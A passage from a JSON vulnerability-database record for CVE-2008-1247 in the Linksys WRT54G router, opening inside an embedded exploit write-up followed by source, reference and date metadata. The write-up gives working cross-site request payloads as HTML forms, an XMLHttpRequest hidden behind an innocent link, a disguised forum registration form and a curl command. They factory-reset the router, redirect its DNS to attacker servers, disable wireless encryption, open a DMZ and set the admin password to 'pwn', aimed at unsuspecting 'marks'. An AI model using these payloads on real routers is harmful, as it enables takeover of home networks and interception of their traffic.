GET. Also different config changes \nrequire different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log. \n\nNow that the malicious page has been composed and sits online living and waiting for marks at \nhttp://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom \nPHP logging script. In mark.txt, our logging file, sample output would resemble something like the \nfollowing. \n\nPotential mark resides at 1.1.1.1\n\nPotential mark resides at 2.2.2.2\n\nPotential mark resides at 3.3.3.3\n\nSo forth... \n\nThey are potential marks because it is unknown whether or not they are using the WRT54G with a \nsupported firmware version that is exploitable using these techniques, and/or the exploit attempt \nfailed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not \nusing the default local address (good for them) that this attack relies on. \n\nWhen they browse the page, because we have set no timeout for this change to occur, they are \ninstantly redirected to http://192.168.1.1/WBasic.tri. The URL, because it is not a GET request, \ndoes not inform the user if they were educated enough of what has just happened, so they may \ncontinue on doing whatever they were doing, more often than not unaware of what has just happened. \nAt the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at \nour leisure and further test the remote host whether or not they are vulnerable to attack. At the \nvery least, we may decide to completely reset the router to rest assured we know its current state \nto make further compromise a snap, such as altering the device\u0027s DNS records for sniffing traffic. \nThis is quite feasible, here\u0027s how. \n\n\u003cform method=\"post\" action=\"http://192.168.1.1/factdefa.tri\"\u003e\n \u003cinput type=\"hidden\" name=\"FactoryDefaults\" value=\"Yes\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n \u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nThis gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes\u0026layout=en\n\nNow we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs \nall incoming and outgoing requests before passing them on to the next in line. \n\n\u003cform method=\"post\" action=\"http://192.168.1.1/Basic.tri\"\u003e\n \u003cinput type=\"hidden\" name=\"dhcp_end\" value=\"149\"\u003e\n \u003cinput type=\"hidden\" name=\"oldMtu\" value=\"1500\"\u003e\n \u003cinput type=\"hidden\" name=\"oldLanSubnet\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"OldWanMode\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"SDHCP1\" value=\"192\"\u003e\n \u003cinput type=\"hidden\" name=\"SDHCP2\" value=\"168\"\u003e\n \u003cinput type=\"hidden\" name=\"SDHCP3\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"SDHCP4\" value=\"100\"\u003e\n \u003cinput type=\"hidden\" name=\"EDHCP1\" value=\"192\"\u003e\n \u003cinput type=\"hidden\" name=\"EDHCP2\" value=\"168\"\u003e\n \u003cinput type=\"hidden\" name=\"EDHCP3\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"EDHCP4\" value=\"150\"\u003e\n \u003cinput type=\"hidden\" name=\"pd\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"now_proto\" value=\"dhcp\"\u003e\n \u003cinput type=\"hidden\" name=\"old_domain\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"chg_lanip\" value=\"192.168.1.1\"\u003e\n \u003cinput type=\"hidden\" name=\"_daylight_time\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"wan_proto\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"router_name\" value=\"WRT54G\"\u003e\n \u003cinput type=\"hidden\" name=\"wan_hostname\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"wan_domain\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"mtu_enable\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_ipaddr_0\" value=\"192\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_ipaddr_1\" value=\"168\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_ipaddr_2\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_ipaddr_3\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_netmask\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_proto\" value=\"Enable\"\u003e\n \u003cinput type=\"hidden\" name=\"dhcp_start\" value=\"100\"\u003e\n \u003cinput type=\"hidden\" name=\"dhcp_num\" value=\"50\"\u003e\n \u003cinput type=\"hidden\" name=\"dhcp_lease\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"dns0_0\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"dns0_1\" value=\"2\"\u003e\n \u003cinput type=\"hidden\" name=\"dns0_2\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"dns0_3\" value=\"4\"\u003e\n \u003cinput type=\"hidden\" name=\"dns1_0\" value=\"5\"\u003e\n \u003cinput type=\"hidden\" name=\"dns1_1\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"dns1_2\" value=\"7\"\u003e\n \u003cinput type=\"hidden\" name=\"dns1_3\" value=\"8\"\u003e\n \u003cinput type=\"hidden\" name=\"dns2_0\" value=\"9\"\u003e\n \u003cinput type=\"hidden\" name=\"dns2_1\" value=\"8\"\u003e\n \u003cinput type=\"hidden\" name=\"dns2_2\" value=\"7\"\u003e\n \u003cinput type=\"hidden\" name=\"dns2_3\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"wins_0\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"wins_1\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"wins_2\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"wins_3\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"time_zone\" value=\"%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29\"\u003e\n \u003cinput type=\"hidden\" name=\"daylight_time\" value=\"ON\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n \u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nThis is indeed convoluted but all of these values must be in place in order to be successful. What \nis it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our \nown custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, \nand DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while \nobtaining its dynamic IP from the ISP. In case you\u0027re curious, these forms are used to construct the \nfollowing URL that is submitted to http://192.168.1.1/Basic.tri. \n\nhttp://192.168.1.1/Basic.tri?dhcp_end=149\u0026oldMtu=1500\u0026oldLanSubnet=0\u0026OldWanMode=0\u0026SDHCP1=192\u0026SDHCP2=168\u0026SDHCP3=1\u0026SDHCP4=100\u0026EDHCP1=192\u0026EDHCP2=168\u0026EDHCP3=1\u0026EDHCP4=150\u0026pd=\u0026now_proto=dhcp\u0026old_domain=\u0026chg_lanip=192.168.1.1\u0026_daylight_time=1\u0026wan_proto=0\u0026router_name=WRT54G\u0026wan_hostname=\u0026wan_domain=\u0026mtu_enable=0\u0026lan_ipaddr_0=192\u0026lan_ipaddr_1=168\u0026lan_ipaddr_2=1\u0026lan_ipaddr_3=1\u0026lan_netmask=0\u0026lan_proto=Enable\u0026dhcp_start=100\u0026dhcp_num=50\u0026dhcp_lease=0\u0026dns0_0=1\u0026dns0_1=2\u0026dns0_2=3\u0026dns0_3=4\u0026dns1_0=5\u0026dns1_1=6\u0026dns1_2=7\u0026dns1_3=8\u0026dns2_0=9\u0026dns2_1=8\u0026dns2_2=7\u0026dns2_3=6\u0026wins_0=0\u0026wins_1=0\u0026wins_2=0\u0026wins_3=0\u0026time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29\u0026daylight_time=ON\u0026layout=en\n\n++| An Alternative (with JavaScript)\n----------------------\nThis is the basic exploitation method of the router although the attacker has many alternatives of \nsubmitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript. \nA few alternative methods would include using a JavaScript onClick function within a standard \nlooking HTML anchor tag to submit the information with XMLHttpRequest, e.g.:\n\n\u003ca href=\"/path/\" onClick=\"xhrRequest();\"\u003eThis looks innocent enough.\u003c/a\u003e\n\n...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this \nstandard looking navigation link, e.g.:\n\nvar xhr=false;\nif(window.XMLHttpRequest) {\n xhr=new XMLHttpRequest();\n} else if(window.ActiveXObject) {\n xhr=new ActiveXObject(\"Microsoft.XMLHTTP\");\n}\nfunction xhrRequest() {\n if(xhr) {\n xhr.open(\"POST\", \"http://192.168.1.1/Security.tri\", true);\n xhr.setRequestHeader(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027);\n xhr.onreadystatechange=function() {\n if(xhr.readyState == 4 \u0026\u0026 xhr.status == 200) {\n var success=xhr.responseText;\n }\n }\n xhr.send(\"SecurityMode=0\u0026layout=en\");\n }\n}\n\nThe example above effectively disables all wireless encryption so that if you happen to live close \nenough to this poor individual, it is your duty to pwn their wireless by enabling open access for \neverybody in the neighborhood! Here\u0027s the URL for disabling wireless encryption:\n\nhttp://192.168.1.1/Security.tri?SecurityMode=0\u0026layout=en\n\n++| An Alternative (without JavaScript)\n----------------------\nYou\u0027re still exploitable even if you do not allow scripts from executing, e.g., you use Firefox + \nNoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent \nlooking methods of compromising your WRT54G. For example, user registration for a bulletin board or \nforum system. The site must acquire a minimal amount of information in order to create the account \nso it is in submitting this data that we may submit our own payload, perhaps this time we\u0027d like to \nenable DMZ for complete access to any and all shares/services on our mark\u0027s computer. Here is the \nURL once again:\n\nhttp://192.168.1.1/dmz.tri?action=Apply\u0026dmz_enable=1\u0026dmz_ipaddr=100\u0026layout=en\n\nAgain it is a different script processing the request on behalf of the router\u0027s internal operating \nsystem, dmz.tri, but it still does not require authentication prior to changing the settings we wish \nto change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.:\n\n\u003cform method=\"post\" action=\"http://192.168.1.1/dmz.tri\"\u003e\n \u003cinput type=\"hidden\" name=\"action\" value=\"Apply\"\u003e\n \u003cinput type=\"hidden\" name=\"dmz_enable\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"dmz_ipaddr\" value=\"100\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n\n...and add these values to their user registration page with standard username/password/e-mail fields... \n \n Username: \u003cinput type=\"text\" name=\"username\"\u003e\u003cbr\u003e\n Password: \u003cinput type=\"password\" name=\"password1\"\u003e\u003cbr\u003e\n Confirm Password: \u003cinput type=\"password\" name=\"password2\"\u003e\u003cbr\u003e\n \u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\n...that can be found on traditional forums these days. The mark submits and exploits his/her own \nrouter although they believe they are at least minimally technically savvy by using a combination of \ntechnologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms \nwe use to store the router configs are hidden, and the normal user registration forms are not, thus \nit is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has \ndetected that a potential attack is taking place it is likely too late as the mastermind behind \nhttp://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up \ntargets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration \nchanges within 10 seconds, which is plenty of time for them to open another terminal and change the \nadministrative login to block our mark from changing their settings, e.g.:\n\ncurl -d \"remote_mgt_https=0\u0026http_enable=1\u0026https_enable=0\u0026PasswdModify=1\u0026http_passwd=pwn\u0026http_passwdConfirm=pwn\u0026_http_enable=1\u0026web_wl_filter=1\u0026remote_management=0\u0026upnp_enable=1\u0026layout=en\" http://\u003cREMOTE_EXTERNAL_ADDR\u003e/manage.tri\n\nHere the hacker can now log in as admin with password \u0027pwn\u0027 with complete freedom to _REMOTELY_ \nmonitor the mark\u0027s internal and outgoing network traffic. This can allow for capturing passwords \nvia DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the \nrouter to a rogue DHCP server and accordingly, rogue network of the attacker\u0027s, plus more. \n\n++| Conclusion\n----------------------\nIt is my intention in finalizing this document that the reader understands that the Linksys WRT54G \nfirmware version 1.00.9 does not care if you inside or outside its local network. Nor does it care \nwhether or not you have the level of privilege thought to be necessary for manipulating sensitive \nobjects. \n\nThanks go to hw2B for suggesting I write all of this garbage out. \n\n++| URLs\n----------------------\nhttps://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document)\nhttps://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008)\nhttps://kinqpinz.info/lib/wrt54g/own2.txt (this document)\nhttp://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "BID",
"id": "28381"
},
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "PACKETSTORM",
"id": "64785"
},
{
"db": "PACKETSTORM",
"id": "67644"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-31372",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-1247",
"trust": 3.0
},
{
"db": "BID",
"id": "28381",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "29344",
"trust": 1.8
},
{
"db": "EXPLOIT-DB",
"id": "5926",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "5313",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20080301 THE ROUTER HACKING CHALLENGE IS OVER!",
"trust": 0.6
},
{
"db": "MILW0RM",
"id": "5313",
"trust": 0.6
},
{
"db": "MILW0RM",
"id": "5926",
"trust": 0.6
},
{
"db": "XF",
"id": "54",
"trust": 0.6
},
{
"db": "XF",
"id": "41118",
"trust": 0.6
},
{
"db": "MISC",
"id": "HTTP://KINQPINZ.INFO/LIB/WRT54G/OWN.TXT",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "67644",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "64904",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-65280",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-8833",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-31372",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "64785",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "BID",
"id": "28381"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "PACKETSTORM",
"id": "64904"
},
{
"db": "PACKETSTORM",
"id": "64785"
},
{
"db": "PACKETSTORM",
"id": "67644"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"id": "VAR-200803-0170",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T11:26:38.262000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Linksys",
"trust": 0.8,
"url": "http://home.cisco.com/en-apac/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://kinqpinz.info/lib/wrt54g/own.txt"
},
{
"trust": 1.9,
"url": "https://kinqpinz.info/lib/wrt54g/"
},
{
"trust": 1.8,
"url": "https://kinqpinz.info/lib/wrt54g/own2.txt"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/28381"
},
{
"trust": 1.7,
"url": "http://www.gnucitizen.org/projects/router-hacking-challenge/"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/29344"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/489009/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/5313"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/5926"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41118"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1247"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1247"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.milw0rm.com/exploits/5926"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/41118"
},
{
"trust": 0.6,
"url": "http://www.milw0rm.com/exploits/5313"
},
{
"trust": 0.3,
"url": "http://www.linksys.com"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/security.tri?securitymode=0\u0026layout=en"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-1247"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/factdefa.tri?factorydefaults=yes\u0026layout=en"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/basic.tri?dhcp_end=149\u0026oldmtu=1500\u0026oldlansubnet=0\u0026oldwanmode=0\u0026sdhcp1=192\u0026sdhcp2=168\u0026sdhcp3=1\u0026sdhcp4=100\u0026edhcp1=192\u0026edhcp2=168\u0026edhcp3=1\u0026edhcp4=150\u0026pd=\u0026now_proto=dhcp\u0026old_domain=\u0026chg_lanip=192.168.1.1\u0026_daylight_time=1\u0026wan_proto=0\u0026router_name=wrt54g\u0026wan_hostname=\u0026wan_domain=\u0026mtu_enable=0\u0026lan_ipaddr_0=192\u0026lan_ipaddr_1=168\u0026lan_ipaddr_2=1\u0026lan_ipaddr_3=1\u0026lan_netmask=0\u0026lan_proto=enable\u0026dhcp_start=100\u0026dhcp_num=50\u0026dhcp_lease=0\u0026dns0_0=1\u0026dns0_1=2\u0026dns0_2=3\u0026dns0_3=4\u0026dns1_0=5\u0026dns1_1=6\u0026dns1_2=7\u0026dns1_3=8\u0026dns2_0=9\u0026dns2_1=8\u0026dns2_2=7\u0026dns2_3=6\u0026wins_0=0\u0026wins_1=0\u0026wins_2=0\u0026wins_3=0\u0026time_zone=%28gmt-08%3a00%29+pacific+time+%28usa+%26+canada%29\u0026daylight_time=on\u0026layout=en"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/dmz.tri?action=apply\u0026dmz_enable=1\u0026dmz_ipaddr=100\u0026layout=en"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/factdefa.tri\"\u003e"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/basic.tri\"\u003e"
},
{
"trust": 0.2,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-1247"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/dmz.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://www.intoto.com/company.shtml."
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wfilter.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/ctlog.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/manage.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wfilter.tri?wl_macmode1=0"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/vpn.tri\"\u003e"
},
{
"trust": 0.1,
"url": "https://kinqpinz.info/lib/wrt54g/,"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/manage.tri?remote_mgt_https=0\u0026http_enable=1\u0026https_enable=0\u0026passwdmodify=1\u0026http_passwd=asdf\u0026http_passwdconfirm=asdf\u0026_http_enable=1\u0026web_wl_filter=1\u0026remote_management=0\u0026upnp_enable=1\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/dmz.tri?action=apply\u0026dmz_enable=0\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/tracert.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/config.bin\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/manage.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/config.bin."
},
{
"trust": 0.1,
"url": "http://192.168.1.1/manage.tri?remote_mgt_https=0\u0026http_enable=1\u0026https_enable=0\u0026passwdmodify=1\u0026http_passwd=asdf\u0026http_passwdconfirm=asdf\u0026_http_enable=1\u0026web_wl_filter=1\u0026remote_management=1\u0026http_wanport=31337\u0026upnp_enable=1\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/factdefa.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wfilter.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/basic.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/rstatus.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri?submit_type=\u0026channelno=11\u0026oldwirelessmode=3\u0026mode=3\u0026ssid=pwnage\u0026channel=6\u0026freq=6\u0026wl_closed=1\u0026sesmode=1\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/ptrigger.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/security.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/dmz.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/security.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/ping.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/basic.tri?dhcp_end=149\u0026oldmtu=1500\u0026oldlansubnet=0\u0026oldwanmode=0\u0026sdhcp1=192\u0026sdhcp2=168\u0026sdhcp3=1\u0026sdhcp4=100\u0026edhcp1=192\u0026edhcp2=168\u0026edhcp3=1\u0026edhcp4=150\u0026pd=\u0026now_proto=dhcp\u0026old_domain=\u0026chg_lanip=192.168.1.1\u0026_daylight_time=1\u0026wan_proto=0\u0026router_name=wrt54g\u0026wan_hostname=\u0026wan_domain=\u0026mtu_enable=0\u0026lan_ipaddr_0=192\u0026lan_ipaddr_1=168\u0026lan_ipaddr_2=1\u0026lan_ipaddr_3=1\u0026lan_netmask=0\u0026lan_proto=enable\u0026dhcp_start=100\u0026dhcp_num=50\u0026dhcp_lease=0\u0026dns0_0=0\u0026dns0_1=0\u0026dns0_2=0\u0026dns0_3=0\u0026dns1_0=0\u0026dns1_1=0\u0026dns1_2=0\u0026dns1_3=0\u0026dns2_0=0\u0026dns2_1=0\u0026dns2_2=0\u0026dns2_3=0\u0026wins_0=0\u0026wins_1=0\u0026wins_2=0\u0026wins_3=0\u0026time_zone=%28gmt-08%3a00%29+pacific+time+%28usa+%26+canada%29\u0026daylight_time=on\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/portrange.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/29344/"
},
{
"trust": 0.1,
"url": "https://psi.secunia.com/?page=changelog"
},
{
"trust": 0.1,
"url": "https://psi.secunia.com/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3523/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://kinqpinz.info/"
},
{
"trust": 0.1,
"url": "http://www.hacker.tld/"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/basic.tri."
},
{
"trust": 0.1,
"url": "http://\u003cremote_external_addr\u003e/manage.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri."
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1."
},
{
"trust": 0.1,
"url": "https://kinqpinz.info/lib/wrt54g/."
},
{
"trust": 0.1,
"url": "http://www.hacker.tld/index.php"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri?submit_type=\u0026channelno=11\u0026oldwirelessmode=3\u0026mode=3\u0026ssid=kinqpinz\u0026channel=6\u0026freq=6\u0026wl_closed=1\u0026sesmode=1\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/security.tri\","
},
{
"trust": 0.1,
"url": "http://www.hacker.tld/index.php,"
},
{
"trust": 0.1,
"url": "http://www.hacker.tld"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "BID",
"id": "28381"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "PACKETSTORM",
"id": "64904"
},
{
"db": "PACKETSTORM",
"id": "64785"
},
{
"db": "PACKETSTORM",
"id": "67644"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "BID",
"id": "28381"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "PACKETSTORM",
"id": "64904"
},
{
"db": "PACKETSTORM",
"id": "64785"
},
{
"db": "PACKETSTORM",
"id": "67644"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-03-10T00:00:00",
"db": "VULHUB",
"id": "VHN-31372"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "28381"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"date": "2008-03-26T21:47:04",
"db": "PACKETSTORM",
"id": "64904"
},
{
"date": "2008-03-21T21:12:32",
"db": "PACKETSTORM",
"id": "64785"
},
{
"date": "2008-06-24T19:34:03",
"db": "PACKETSTORM",
"id": "67644"
},
{
"date": "2008-03-10T17:44:00",
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"date": "2008-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-31372"
},
{
"date": "2009-04-29T20:56:00",
"db": "BID",
"id": "28381"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"date": "2018-10-11T20:31:17.277000",
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"date": "2008-09-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54g On the router Web Vulnerability to execute arbitrary administrator operations in the interface",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
